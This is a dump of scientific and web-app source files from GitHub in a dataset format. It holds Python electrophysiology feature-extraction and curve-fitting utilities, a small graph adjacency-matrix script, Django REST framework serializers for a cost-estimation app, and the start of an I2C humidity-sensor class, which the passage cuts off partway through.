{}\n\n\t\t\tdataFeat[obj]['depol'][key][dpI[ii]] = deepcopy(err)\n\n\tif \"FI\" in infoDict['objectives'].keys():\n\n\t\terr = epo.getFISlope(dpData, infoDict['objectives'], dpI, dt=dt,\n\t\t\treturnAll=False)\n\n\t\tif verbose > 2:\n\t\t\tif not isinstance(err, float):\n\t\t\t\tfor e in err:\n\t\t\t\t\tprint(f\"F-I Slope = {e:.4g}Hz/pA\")\n\t\t\telse:\n\t\t\t\tprint(f\"F-I Slope = {err:.4g}Hz/pA\")\n\n\t\ttry:\n\t\t\t_ = dataFeat['FI']\n\t\texcept KeyError:\n\t\t\tdataFeat['FI'] = {}\n\n\t\tif key is not None:\n\t\t\tkey = utl.force_pos_int(key, name='epu.getDepolStepsFeats.key',\n\t\t\t\tzero_ok=True, verbose=verbose)\n\t\telse:\n\t\t\tkey = list(out['FI'].keys()).sort().pop() + 1\n\n\t\ttry:\n\t\t\t_ = dataFeat['FI'][key]\n\t\texcept KeyError:\n\t\t\tdataFeat['FI'][key] = {}\n\n\t\tdataFeat['FI'][key] = deepcopy(err)\n\n\treturn dataFeat\n\n\n################################################################################\n## Get Electrophysiology Features from Hyperpolarization Steps Protocol\n################################################################################\ndef getHyperpolStepsFeatures(data, hdr, infoDict, dataFeat, key=None,\n\tverbose=0):\n\n\tverbose = utl.force_pos_int(verbose,\n\t\tname='epu.getHyperpolStepsFeatures.verbose', zero_ok=True)\n\n\tif verbose > 1:\n\t\tprint(\"Getting features from HYPERPOL STEPS PROTOCOL\")\n\n\tdt = deepcopy(infoDict['data']['dt'])\n\n\tdata = data[:, 0].squeeze()\n\n\thpData, hpIdx, hpI = getHyperpolIdx(data, hdr,\n\t\tprotocol=EPHYS_PROT_HYPERPOLSTEPS)\n\n\tif verbose > 2:\n\t\tprint(f\"There are {hdr['lActualEpisodes']} episodes!\")\n\n\n\tfor ii, hpD in enumerate(hpData.T):\n\n\t\tif verbose > 2:\n\t\t\tprint(f\"Extracting features from episode {ii}!\")\n\n\t\tspikeIdx, spikeVals = epo.getSpikeIdx(hpD, dt=dt,\n\t\t\t**infoDict['objectives']['Spikes'])\n\n\t\tfor obj in infoDict['objectives']:\n\n\t\t\tif verbose > 3:\n\t\t\t\tprint(f\"Considering objective {obj}\")\n\n\t\t\tsubInfo = infoDict['objectives'][obj]\n\n\t\t\tif obj == \"PSD\":\n\t\t\t\terr = epo.getPSD(hpD, spikeIdx, dt=dt, **subInfo)\n\n\t\t\t\tif not isinstance(err, float):\n\t\t\t\t\terr = err[1]\n\n\t\t\t\tif verbose > 2:\n\t\t\t\t\tprint(f\"PSD = {err:.4g}mV\")\n\n\t\t\telse:\n\t\t\t\tcontinue\n\n\t\t\ttry:\n\t\t\t\t_ = dataFeat[obj]\n\t\t\texcept KeyError:\n\t\t\t\tdataFeat[obj] = {}\n\n\t\t\ttry:\n\t\t\t\t_ = dataFeat[obj]['hyperpol']\n\t\t\texcept:\n\t\t\t\tdataFeat[obj]['hyperpol'] = {}\n\n\t\t\tif key is not None:\n\t\t\t\tkey = utl.force_pos_int(key, name='epu.getHyperpolFeatures.key',\n\t\t\t\t\tzero_ok=True, verbose=verbose)\n\t\t\telse:\n\t\t\t\tkey = list(out[obj]['hyperpol'].keys()).sort().pop() + 1\n\n\t\t\ttry:\n\t\t\t\t_ = dataFeat[obj]['hyperpol'][key]\n\t\t\texcept KeyError:\n\t\t\t\tdataFeat[obj]['hyperpol'][key] = {}\n\n\t\t\tdataFeat[obj]['hyperpol'][key][hpI[ii]] = deepcopy(err)\n\n\tif \"RI\" in infoDict['objectives'].keys():\n\n\t\terr = epo.getInputResistance(hpData, infoDict['objectives'], hpI,\n\t\t\tdt=dt, **infoDict['objectives']['RI'])\n\n\t\tif isinstance(err, dict):\n\t\t\tRIerr = err['linFitP'][0]\n\n\t\tif verbose > 2:\n\t\t\tprint(f\"Input Resistance = {err:.4g} GOhms\")\n\n\t\ttry:\n\t\t\t_ = dataFeat['RI']\n\t\texcept KeyError:\n\t\t\tdataFeat['RI'] = {}\n\n\t\tif key is not None:\n\t\t\tkey = utl.force_pos_int(key, name='epu.getHyperpolStepsFeats.key',\n\t\t\t\tzero_ok=True, verbose=verbose)\n\t\telse:\n\t\t\tkey = list(out['RI'].keys()).sort().pop() + 1\n\n\t\ttry:\n\t\t\t_ = dataFeat['RI'][key]\n\t\texcept KeyError:\n\t\t\tdataFeat['RI'][key] = {}\n\n\t\t# print(dataFeat['RI'], key, dataFeat['RI'][key])\n\n\t\tdataFeat['RI'][key] = deepcopy(RIerr)\n\n\t\tif infoDict['objectives']['RI']['estTau']:\n\t\t\ttry:\n\t\t\t\t_ = dataFeat['tau']\n\t\t\texcept KeyError:\n\t\t\t\tdataFeat['tau'] = {}\n\n\t\t\tif isinstance(err, dict):\n\t\t\t\ttauErr = err['tau']\n\t\t\telse:\n\t\t\t\ttauErr = np.nan\n\n\t\t\tdataFeat['tau'][key] = deepcopy(tauErr)\n\n\t\tif infoDict['objectives']['RI']['estC']:\n\t\t\ttry:\n\t\t\t\t_ = dataFeat['C']\n\t\t\texcept KeyError:\n\t\t\t\tdataFeat['C'] = {}\n\n\t\t\tif isinstance(err, dict):\n\t\t\t\tCErr = err['C']\n\t\t\telse:\n\t\t\t\tCErr = np.nan\n\n\t\t\tdataFeat['C'][key] = deepcopy(CErr)\n\n\treturn dataFeat\n\n\n################################################################################\n## Get Electrophysiology Features from Constant Holding Protocol\n################################################################################\ndef getConstHoldFeatures(data, hdr, infoDict, dataFeat, key=None, verbose=0):\n\n\tverbose = utl.force_pos_int(verbose,\n\t\tname='epu.getConstHoldFeatures.verbose', zero_ok=True)\n\n\tif verbose > 1:\n\t\tprint(\"Getting features from CONSTANT HOLD PROTOCOL\")\n\n\tif hdr['lActualEpisodes'] > 1:\n\t\tif verbose:\n\t\t\tprint(\"WARNING: At this time, we cannot handle multi-episode hold\"\n\t\t\t\t\"ing current protocols (non-rest + no current-injection).\")\n\t\treturn dataFeat\n\n\tdata = data[:, 0].squeeze()\n\n\t## For const hold protocols, want to make spikes are larger than noise\n\tholdData = data[:int(abf.GetHoldingDuration(hdr)/hdr['nADCNumChannels'])]\n\tspikeDict = infoDict['objectives']['Spikes'].copy()\n\n\tspikeIdx, spikeVals = epo.getSpikeIdx(data, dt=infoDict['data']['dt'],\n\t\t**spikeDict)\n\n\tfor obj in infoDict['objectives']:\n\n\t\tsubInfo = infoDict['objectives'][obj]\n\n\t\t## For const hold protocols, only want mean fit.\n\t\tsubInfo['fit'] = 'mean'\n\n\t\tif obj == 'ISI':\n\t\t\terr = epo.getISI(spikeIdx, dt=infoDict['data']['dt'],\n\t\t\t\t**subInfo)\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"ISI = {err:.4g}ms (FR = {1/err:.4g}Hz)\")\n\n\t\telif obj == 'Amp':\n\t\t\terr = epo.getSpikeAmp(spikeIdx, spikeVals,\n\t\t\t\tdt=infoDict['data']['dt'], **subInfo)\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"Amp = {err:.4g}mV\")\n\n\t\telif obj == 'PSD':\n\t\t\terr = epo.getPSD(data, spikeIdx,\n\t\t\t\tdt=infoDict['data']['dt'], **subInfo)\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"PSD = {err:.4g}mV\")\n\n\t\telse:\n\t\t\tcontinue\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]\n\t\texcept KeyError:\n\t\t\tdataFeat[obj] = {}\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]['hold']\n\t\texcept KeyError:\n\t\t\tdataFeat[obj]['hold'] = {}\n\n\t\tif key is not None:\n\t\t\tkey = utl.force_pos_int(key, name='epu.getConstHoldFeatures.key',\n\t\t\t\tzero_ok=True, verbose=verbose)\n\t\telse:\n\t\t\tkey = list(out[obj]['hold'].keys()).sort().pop() + 1\n\n\t\tdataFeat[obj]['hold'][key] = deepcopy(err)\n\n\treturn dataFeat.copy()\n\n\n################################################################################\n################################################################################\n##\n##\t\tElectrophysiology Data Processing Methods\n##\n################################################################################\n################################################################################\n\n\n################################################################################\n## Get Indices, Current of Depolarization Step\n################################################################################\ndef getDepolIdx(data, hdr, protocol=None, verbose=0):\n\t\"\"\"getDepolIdx(data, hdr, protocol=None):\n\n\tGet the section of data, indices, and input current corresponding to a\n\tdepolarization step(s) protocol.\n\n\tINPUTS:\n\t=======\n\tdata \t\t(ndarray)\t\tArray containing ephys data to be parsed.\n\n\thdr \t\t(dict)\t\t\tHeader dictionary corresponding to data.\n\n\tprotocol \t(int)\t\t\t(Default: None) integer key indicating the \n\t\t\t\t\t\t\t\texperimental protocol used to generate data.\n\t\t\t\t\t\t\t\tWill be inferred from header if not indicated.\n\n\tverbose \t(int)\t\t\t(Default: 0) Flag for verbosity of method.\n\t\t\t\t\t\t\t\tDefault is lowest verbosity.\n\n\tOUTPUTS:\n\t=========\n\tdata \t\t(ndarray)\t\tTruncated data array corresponding to depol \n\t\t\t\t\t\t\t\tstep(s) region.\n\n\tdpIdx \t\t(tuple)\t\t\tTuple of indices indicating where in the data\n\t\t\t\t\t\t\t\tarray the depol step(s) begin and end.\n\n\tdpI \t\t(float, list)\tInput current of depol step(s). If multiple\n\t\t\t\t\t\t\t\tsteps, gives list of currents.\n\t\"\"\"\n\n\tverbose = utl.force_pos_int(verbose, name='epu.getDepolIdx.verbose',\n\t\tzero_ok=True)\n\n\tif protocol is None:\n\t\tprotocol = getExpProtocol(hdr)\n\telse:\n\t\tprotocol = utl.force_int(protocol, name='epu.getHyperpolIdx.verbose',\n\t\t\tverbose=verbose)\n\n\tuDACChan = hdr['nActiveDACChannel']\n\n\tepochIdx = getEpochIdx(hdr)\n\n\t## If not known protocol, raise error\n\tif protocol < 0:\n\t\terr_str = f\"Invalid value for keyword 'protocol'... {protocol} \"\n\t\terr_str += \"is not a known ephys protocol.\"\n\t\traise ValueError(err_str)\n\n\telif protocol == EPHYS_PROT_DEPOLSTEP:\n\n\t\terr_str = f\"Input argument 'data' must have 1 dims, got {data.ndim}.\"\n\t\tassert data.ndim == 1, err_str\n\n\t\tif len(np.unique(epochIdx, axis=0)) == 1:\n\t\t\tepochIdx = epochIdx[0]\n\t\telse:\n\t\t\terr_str = \"ERROR: Multiple epoch protocols for DEPOL STEP PROTOCOL!\"\n\t\t\traise ValueError(err_str)\n\n\t\tholdCurr = abf.GetHoldingLevel(hdr, uDACChan, 1)\n\n\t\tepochLevs = hdr['fEpochInitLevel'][uDACChan]\n\t\tepochLevs = epochLevs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\n\t\tif len(np.unique(epochLevs)) == 2:\n\t\t\tdpEpchIdx = (epochLevs != holdCurr).nonzero()[0]\n\n\t\t\tdpI = hdr['fEpochInitLevel'][uDACChan][dpEpchIdx]\n\n\t\telse:\n\t\t\tepochIncs = hdr['fEpochLevelInc'][uDACChan]\n\t\t\tepochIncs = epochIncs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\n\t\t\tdpEpchIdx = (epochIncs != 0).nonzero()[0]\n\n\t\t\tdpI = hdr['fEpochInitLevel'][uDACChan][dpEpchIdx]\n\t\t\tdpI += hdr['fEpochLevelInc'][uDACChan][dpEpchIdx]\n\n\t\tstartIdx = int(epochIdx[dpEpchIdx+1])\n\t\tendIdx = int(epochIdx[dpEpchIdx+2])\n\t\tdpIdx = (startIdx, endIdx)\n\n\t\tdata = data[startIdx:endIdx]\n\n\t\treturn data, dpIdx, dpI\n\n\telif protocol == EPHYS_PROT_DEPOLSTEPS:\n\n\t\terr_str = f\"Input argument 'data' must have 2 dims, got {data.ndim}.\"\n\t\tassert data.ndim == 2, err_str\n\n\t\tepochLevs = hdr['fEpochInitLevel'][uDACChan]\n\t\tepochLevs = epochLevs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\n\t\tif len(np.unique(epochLevs)) == 2:\n\t\t\tdpEpchIdx = (epochLevs != holdCurr).nonzero()[0]\n\n\t\telse:\n\t\t\tepochIncs = hdr['fEpochLevelInc'][uDACChan]\n\t\t\tepochIncs =epochIncs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\t\t\tdpEpchIdx = (epochIncs).nonzero()[0]\n\n\n\t\tif len(np.unique(epochIdx, axis=0)) == 1:\n\t\t\tepochIdx = epochIdx[0]\n\n\t\t\tstartIdx = int(epochIdx[dpEpchIdx+1])\n\t\t\tendIdx = int(epochIdx[dpEpchIdx+2])\n\t\t\tdpIdx = (startIdx, endIdx)\n\n\t\t\tdata = data[startIdx:endIdx]\n\n\t\t\tdpI = []\n\t\t\tfor epNo in range(hdr['lActualEpisodes']):\n\n\t\t\t\ttmpI = hdr['fEpochInitLevel'][uDACChan][dpEpchIdx]\n\t\t\t\ttmpI += epNo*hdr['fEpochLevelInc'][uDACChan][dpEpchIdx]\n\n\t\t\t\tdpI.append(tmpI)\n\n\t\telse:\n\t\t\tdpData, dpIdx, dpI = [], [], []\n\n\t\t\tfor epNo in range(hdr['lActualEpisodes']):\n\n\t\t\t\tstartIdx = int(epochIdx[epNo, dpEpchIdx+1])\n\t\t\t\tendIdx = int(epochIdx[epNo, dpEpchIdx+2])\n\t\t\t\tdpIdx.append((startIdx, endIdx))\n\n\t\t\t\tdpData.append(data[startIdx:endIdx, epNo])\n\n\t\t\t\ttmpI = hdr['fEpochInitLevel'][uDACChan][dpEpchIdx]\n\t\t\t\ttmpI += epNo*hdr['fEpochLevelInc'][uDACChan][dpEpchIdx]\n\n\t\t\t\tdpI.append(tmpI)\n\n\t\t\ttry:\n\t\t\t\tdata = np.array(dpData).astype(float)\n\t\t\texcept:\n\t\t\t\terr_str = f\"Error coercing dpData into np.ndarray... Probably \"\n\t\t\t\terr_str += \"should not allow episodes of different lengths!\"\n\t\t\t\traise ValueError(err_str)\n\n\t\treturn data, dpIdx, np.array(dpI).squeeze()\n\n\telse:\n\t\terr_str = f\"Invalid value for keyword 'protocol'... Protocol={protocol}\"\n\t\terr_str += \" is not allowed (only expect depol step(s)).\"\n\t\traise ValueError(err_str)\n\n\n################################################################################\n## Get Indices, Current of Hyperpolarization Step\n################################################################################\ndef getHyperpolIdx(data, hdr, protocol=None, verbose=0):\n\t\"\"\"getHyperpolIdx(data, hdr, protocol=None):\n\n\tGet the section of data, indices, and input current corresponding to a\n\thyperpolarization step(s) protocol.\n\n\tINPUTS:\n\t=======\n\tdata \t\t(ndarray)\t\tArray containing ephys data to be parsed.\n\n\thdr \t\t(dict)\t\t\tHeader dictionary corresponding to data.\n\n\tprotocol \t(int)\t\t\t(Default: None) integer key indicating the \n\t\t\t\t\t\t\t\texperimental protocol used to generate data.\n\t\t\t\t\t\t\t\tWill be inferred from header if not indicated.\n\n\tverbose \t(int)\t\t\t(Default: 0) Flag for verbosity of method.\n\t\t\t\t\t\t\t\tDefault is lowest verbosity.\n\n\tOUTPUTS:\n\t=========\n\tdata \t\t(ndarray)\t\tTruncated data array corresponding to hyperpol \n\t\t\t\t\t\t\t\tstep(s) region.\n\n\thpIdx \t\t(tuple)\t\t\tTuple of indices indicating where in the data\n\t\t\t\t\t\t\t\tarray the hyperpol step(s) begin and end.\n\n\thpI \t\t(float, list)\tInput current of hyperpol step(s). If multiple\n\t\t\t\t\t\t\t\tsteps, gives list of currents.\n\t\"\"\"\n\n\tverbose = utl.force_pos_int(verbose, name='epu.getHyperpolIdx.verbose',\n\t\tzero_ok=True)\n\n\tif protocol is None:\n\t\tprotocol = getExpProtocol(hdr)\n\telse:\n\t\tprotocol = utl.force_int(protocol, name='epu.getHyperpolIdx.verbose',\n\t\t\tverbose=verbose)\n\n\tepochIdx = getEpochIdx(hdr)\n\n\tuDACChan = hdr['nActiveDACChannel']\n\n\t## If not known protocol, raise error\n\tif protocol < 0:\n\t\terr_str = f\"Invalid value for keyword 'protocol'... {protocol} \"\n\t\terr_str += \"is not a known ephys protocol.\"\n\t\traise ValueError(err_str)\n\n\telif protocol == EPHYS_PROT_HYPERPOLSTEP:\n\n\t\tif len(np.unique(epochIdx, axis=0)) == 1:\n\t\t\tepochIdx = epochIdx[0]\n\t\telse:\n\t\t\terr_str = \"ERROR: Multiple epoch protocols for HYPERPOL STEP \"\n\t\t\terr_str += \"PROTOCOL!\"\n\t\t\traise ValueError(err_str)\n\n\t\tholdCurr = abf.GetHoldingLevel(hdr, uDACChan, 1)\n\n\t\tepochLevs = hdr['fEpochInitLevel'][uDACChan]\n\t\tepochLevs = epochLevs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\n\t\tif len(np.unique(epochLevs)) == 2:\n\t\t\thpEpchIdx = (epochLevs != holdCurr).nonzero()[0]\n\n\t\t\thpI = hdr['fEpochInitLevel'][uDACChan][hpEpchIdx]\n\n\t\telse:\n\t\t\tepochIncs = hdr['fEpochLevelInc'][uDACChan]\n\t\t\tepochIncs =epochIncs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\n\t\t\thpEpchIdx = (epochIncs).nonzero()[0]\n\n\t\t\thpI = hdr['fEpochInitLevel'][uDACChan][hpEpchIdx]\n\t\t\thpI += hdr['fEpochLevelInc'][uDACChan][hpEpchIdx]\n\n\t\tstartIdx = int(epochIdx[hpEpchIdx+1])\n\t\tendIdx = int(epochIdx[hpEpchIdx+2])\n\t\thpIdx = (startIdx, endIdx)\n\n\t\tdata = data[startIdx:endIdx]\n\n\t\treturn data, hpIdx, hpI\n\n\n\telif protocol == EPHYS_PROT_HYPERPOLSTEPS:\n\n\t\terr_str = f\"Input argument 'data' must have 2 dims, got {data.ndim}.\"\n\t\tassert data.ndim == 2, err_str\n\t\t\n\t\tholdCurr = abf.GetHoldingLevel(hdr, uDACChan, 1)\n\n\t\tepochLevs = hdr['fEpochInitLevel'][uDACChan]\n\t\tepochLevs = epochLevs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\n\t\t# if len(np.unique(epochLevs)) == 2:\n\t\t# \thpEpchIdx = (epochLevs != holdCurr).nonzero()[0]\n\n\t\t# else:\n\t\tepochIncs = hdr['fEpochLevelInc'][uDACChan]\n\t\tepochIncs =epochIncs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\n\t\thpEpchIdx = (epochIncs).nonzero()[0]\n\n\t\tif len(np.unique(epochIdx, axis=0)) == 1:\n\t\t\tepochIdx = epochIdx[0]\n\n\t\t\tstartIdx = int(epochIdx[hpEpchIdx+1])\n\t\t\tendIdx = int(epochIdx[hpEpchIdx+2])\n\t\t\thpIdx = (startIdx, endIdx)\n\n\t\t\tdata = data[startIdx:endIdx]\n\n\t\t\thpI = []\n\t\t\tfor epNo in range(hdr['lActualEpisodes']):\n\n\t\t\t\ttmpI = hdr['fEpochInitLevel'][uDACChan][hpEpchIdx]\n\t\t\t\ttmpI += epNo*hdr['fEpochLevelInc'][uDACChan][hpEpchIdx]\n\n\t\t\t\thpI.append(tmpI)\n\n\t\telse:\n\t\t\thpData, hpIdx, hpI = [], [], []\n\n\t\t\tfor epNo in range(hdr['lActualEpisodes']):\n\n\t\t\t\tstartIdx = int(epochIdx[epNo, hpEpchIdx+1])\n\t\t\t\tendIdx = int(epochIdx[epNo, hpEpchIdx+2])\n\t\t\t\thpIdx.append((startIdx, endIdx))\n\n\t\t\t\thpData.append(data[startIdx:endIdx, epNo])\n\n\t\t\t\ttmpI = hdr['fEpochInitLevel'][uDACChan][hpEpchIdx]\n\t\t\t\ttmpI += epNo*hdr['fEpochLevelInc'][uDACChan][hpEpchIdx]\n\n\t\t\t\thpI.append(tmpI)\n\n\t\t\ttry:\n\t\t\t\tdata = np.array(hpData).astype(float)\n\t\t\texcept:\n\t\t\t\terr_str = f\"Error coercing hpData into np.ndarray... Probably \"\n\t\t\t\terr_str += \"should not allow episodes of different lengths!\"\n\t\t\t\traise ValueError(err_str)\n\n\t\treturn data, hpIdx, np.array(hpI).squeeze()\n\n\telse:\n\t\terr_str = f\"Invalid value for keyword 'protocol'... Protocol={protocol}\"\n\t\terr_str += \" is not allowed (only expect depol step(s)).\"\n\t\traise ValueError(err_str)\n\n\n################################################################################\n## Get Rolling Percentile of Data\n################################################################################\ndef getRollPerc(data, window=100, perc=50., verbose=0, edgeCorrect=True):\n\n\t############################################################################\n\t##\tCheck Inputs, Keyword Arguments\n\t############################################################################\n\tif True:\n\n\t\t## Check the verbosity keyword\n\t\tverbose = utl.force_pos_int(verbose, name='epu.getRollPerc.verbose', \n\t\t\tzero_ok=True, verbose=verbose)\n\n\t\t## Check the type and shape of the data\n\t\tdata = utl.force_float_arr(data, name='epu.getRollPerc.data',\n\t\t\tverbose=verbose).squeeze()\n\n\t\terr_str = \"Input argument 'data' must be 1D array.\"\n\t\terr_str += f\" (data.ndim = {data.ndim})\"\n\t\tassert data.ndim == 1, err_str\n\n\t\t## Check that 'window' is an integer and is odd\n\t\twindow = utl.force_pos_int(window, name='epu.getRollPerc.window',\n\t\t\tverbose=verbose)\n\t\twindow = window + 1 if ((window % 2) == 0) else window\n\n\t\tperc = utl.force_pos_float(perc, name=\"epu.getRollPerc.perc\",\n\t\t\tverbose=verbose)\n\t\terrStr = \"Keyword argument 'perc' must be a percentage (0, 100).\"\n\t\tassert perc < 100, errStr\n\n\t\terrStr = \"Keyword argument 'edgeCorrect' must be a boolean.\"\n\t\tassert isinstance(edgeCorrect, bool), errStr\n\n\t############################################################################\n\t##\tCalculate Percentile\n\t############################################################################\n\t\torder = int(window*perc/100.)\n\n\t\t## Get the rolling median\n\t\tmedData = sig.order_filter(data, np.ones(window), order)\n\n\t\tif edgeCorrect:\n\t\t\t## Edge correct the median\n\t\t\twindArr = np.arange(window).astype(int)\n\t\t\toddArr = (windArr + windArr%2. + 1).astype(int)\n\t\t\tleftEnd, rightEnd = [], []\n\t\t\tcounter = 0\n\t\t\tfor (ii, wd) in zip(windArr, oddArr):\n\n\t\t\t\tif verbose >= 3:\n\t\t\t\t\tif (counter + 1) % 20 == 0.:\n\t\t\t\t\t\tprint(f\"{counter+1}/{len(windArr)}: {ii}, {wd}\")\n\t\t\t\t\n\t\t\t\tleftEnd.append(sig.order_filter(data[:window*2], np.ones(wd),\n\t\t\t\t\tint((wd-1)/2))[ii])\n\n\t\t\t\twd = oddArr[-1]-wd+1\n\t\t\t\trightEnd.append(sig.order_filter(data[-window*2-1:],\n\t\t\t\t\tnp.ones(wd), int((wd-1)/2))[-(window-ii)-1])\n\n\t\t\t\tcounter += 1\n\n\t\t\tmedData[:window] = np.array(leftEnd)\n\t\t\tmedData[-window:] = np.array(rightEnd)\n\n\t\t## Get rolling percentile array\n\t\treturn medData\n\n\n################################################################################\n################################################################################\n##\n##\t\tFitting Routines\n##\n################################################################################\n################################################################################\n\n\n################################################################################\n## Fit an Exponential\n################################################################################\ndef fitExp(data, times=None, returnAll=False):\n\n\t## Check that data is floats and 1D\n\tdata = utl.force_float_arr(data).squeeze()\n\n\terr_str = \"(ephys_utl.fitExp): Invalid shape for input argument 'data'; \"\n\terr_str += f\"expected 1D, got {data.shape}\"\n\tassert data.ndim == 1, err_str\n\n\t## Set time grid on which to fit Exp\n\tif times is None:\n\t\ttimes = np.arange(len(data)).astype(float)\n\telse:\n\t\ttimes = utl.force_float_arr(times)\n\n\t## Try and fit the curve!\n\ttry:\n\t## Set initial guess based on data\n\t\tp0 = [\n\t\t\tmax(-150, min(data[0], 100)),\n\t\t\tmax(-150, min(np.mean(data), 100)),\n\t\t\tmax(0, min(len(data)/10., np.inf))\n\t\t]\n\n\t\tlb = [\n\t\t\tmin(-150, data[0]-20),\n\t\t\tmin(-150, data.min() - 30),\n\t\t\t0\n\t\t]\n\n\t\tub = [\n\t\t\tmax(100, data[0]+20),\n\t\t\tmax(100, data.max() + 30),\n\t\t\tnp.inf\n\t\t]\n\n\t\t## Fit the curve with some reasonable bounds\n\t\tparams, cov = curve_fit(offsetExp, times, data, p0=p0, bounds=(lb, ub))\n\t\tcov = np.diag(cov)\n\n\t## If something went wrong, return a really bad result\n\texcept:\n\t\tparams = [-150, -150, 0]\n\t\tcov = [100, 100, 100]\n\n\t## If needed, return everything\n\tif returnAll:\n\t\treturn np.array(params).astype(float), np.array(cov).astype(float)\n\telse:\n\t\treturn np.array(params).astype(float)\n\n\n################################################################################\n## Offset Exponenital Function\n################################################################################\ndef offsetExp(t, V0, VInf, tau):\n\treturn VInf + (V0-VInf)*np.exp(-t/tau)","repo_name":"ejohnson643/MOO_CNM","sub_path":"Objectives/Electrophysiology/ephys_util.py","file_name":"ephys_util.py","file_ext":"py","file_size_in_byte":36793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"7704031467","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 1 10:51:19 2020\n\n@author: YuJeong\n\"\"\"\n\n# Adjacency Matrix representation in Python\n\nimport os \nimport copy, random\nimport string\nfrom pathlib import Path\n\nclass Graph(object):\n\n # Initialize the matrix\n def __init__(self, size, index):\n self.adjMatrix = []\n self.index = index\n for i in range(size):\n self.adjMatrix.append([0 for i in range(size)])\n self.size = size\n\n # Add edges\n def add_edge(self, v1, v2, weight):\n if v1 == v2:\n print(\"Same vertex %d and %d\" % (v1, v2))\n self.adjMatrix[v1][v2] = weight\n self.adjMatrix[v2][v1] = weight\n\n # Remove edges\n def remove_edge(self, v1, v2):\n if self.adjMatrix[v1][v2] == 0:\n print(\"No edge between %d and %d\" % (v1, v2))\n return\n self.adjMatrix[v1][v2] = 0\n self.adjMatrix[v2][v1] = 0\n\n def __len__(self):\n return self.size\n\n # Print the matrix\n def print_matrix(self):\n for row in self.adjMatrix:\n for val in row:\n print('{:4}'.format(val), end = ' ')\n print()\n\n def writeFile(self):\n ind = '0 '\n ind0 = '0 '\n for i in range(self.size):\n ind = ind + chr(ord('A') + i) + ' '\n ind0 = ind0 + '0 '\n \n #filename = \"\\\\datasets\\\\group\" + str(self.index+1) + \"\\\\represent\" + str(self.index) + '.txt'\n filename = \"\\\\datasets\\\\structure_fsm\\\\rep\" + str(self.index) + '.txt'\n path = str(Path(__file__).parent.parent) + filename\n print(path)\n f = open(path, 'w')\n f.write(ind0+'\\n')\n for row in self.adjMatrix:\n line = '0 '\n for val in row:\n line = line + str(val) + ' '\n print(line)\n f.write(line+'\\n')\n f.close()\n #f.write()\n\n\ndef createGraph(ithGraph):\n vnum = int(input(\"vertex num: \"))\n g = Graph(vnum, ithGraph)\n\n while True:\n inp = input(\"u v weight: \")\n if inp != 'z':\n a, b, weight = list(map(int, inp.split(' ')))\n \n #a, b = list(map(int, inp.split(' ')))\n #weight = float(input('weight: '))\n g.add_edge(a, b, weight)\n else:\n break\n g.print_matrix()\n g.writeFile()\n\n\n\nif __name__ == '__main__':\n repNum = int(input(\"Represent graph number: \" ))\n for i in range(repNum): \n print('='*60)\n createGraph(i)\n print('='*60)\n # writeFile()\n \n \n \n \n \n ","repo_name":"YYuJeong/Frequent-Subgraph-Mining-Using-Deep-Learning","sub_path":"create/createRepresentGraph.py","file_name":"createRepresentGraph.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40767849134","text":"from django.db import models\n\nfrom rest_framework.serializers import ModelSerializer, SerializerMethodField\n\nfrom smeta.models import Boq, BoqItem, Consumption, Resource, MaterialExtraInfo\n\n\nclass BoqModelSerializer(ModelSerializer):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n from company.serializers import ProjectModelSerializer\n self.fields['project_object'] = ProjectModelSerializer(source='project', read_only=True)\n class Meta:\n model = Boq\n fields = '__all__'\n\n\nclass BoqItemModelSerializer(ModelSerializer):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n from common.serializers import UnitModelSerializer\n self.fields['unit_object'] = UnitModelSerializer(source='unit', read_only=True)\n \n class Meta:\n model = BoqItem\n fields = '__all__'\n\n\nclass MaterialExtraInfoModelSerializer(ModelSerializer):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n from common.serializers import CountryModelSerializer\n self.fields['country_object'] = CountryModelSerializer(source='country', read_only=True)\n \n class Meta:\n model = MaterialExtraInfo\n fields = '__all__'\n\n\nclass ResourceModelSerializer(ModelSerializer):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n from common.serializers import UnitModelSerializer, CountryModelSerializer\n self.fields['unit_object'] = UnitModelSerializer(source='unit', read_only=True)\n self.fields['country_object'] = CountryModelSerializer(source='country', read_only=True)\n quantity = SerializerMethodField()\n extra_infos = MaterialExtraInfoModelSerializer(many=True, read_only=True)\n class Meta:\n model = Resource\n fields = '__all__'\n\n def get_quantity(self, obj):\n return obj.quantity\n\n\nclass ConsumptionModelSerializer(ModelSerializer):\n boq_item_object = BoqItemModelSerializer(source='boq_item', read_only=True)\n resource_object = ResourceModelSerializer(source='resource', read_only=True)\n class Meta:\n model = Consumption\n fields = '__all__'","repo_name":"amanmyrats/smetcik","sub_path":"backend/smeta/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36387977772","text":"import smbus2\nimport time\n\n\nclass PmodHygro:\n \"\"\"class that define procedures of Pmod HYGRO (relative humidity sensor with an integrated temperature sensor)\"\"\"\n\n \n # address variables\n I2C_ADDR = 0x40 # unique 7-bit address of Pmod HYGRO device on the I2C bus \n TMP_REG = 0x00 # temperature register address\n HUM_REG = 0x01 # relative humidity register address\n CONFIG_REG = 0x02 # configuration register address\n\n\n def __init__(self):\n \"\"\"initialize variables of sensor data\"\"\"\n self.temperature = 0.0\n self.humidity = 0.0\n self.i2cbus = None\n \n\n def 